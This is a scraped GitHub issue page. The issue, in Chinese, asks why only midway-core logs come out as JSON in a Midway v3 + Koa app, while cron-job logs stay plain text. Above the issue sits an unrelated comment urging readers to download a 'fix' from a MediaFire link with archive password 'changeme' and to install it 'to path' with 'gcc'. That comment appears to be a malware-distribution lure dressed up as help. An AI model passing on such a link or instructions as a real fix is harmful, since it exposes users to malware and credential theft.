You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
1、项目说明: midway v3 + koa
1、期望效果:将所有应用日志均输出为JSON格式。
2、实际效果:仅midway-core日志生效。
midway-core.json.log:
{"timestamp":"2024-08-27 11:18:48.159","level":"info","pid":42469,"message":"[midway:redis] client connect success"}
midway-cron.json.log:
2024-08-27 11:18:00.048 ERROR 41827 [DailyAnalyzeJob] 出错了
3、config.default.ts代码实例:
4、日志输出方式:
5、补充说明:通过手动设置修改Koa上下文日志格式,可以在请求时让conmon-error日志中输出JSON格式,但是在job定时任务里面依然无法输出JSON格式。
The text was updated successfully, but these errors were encountered: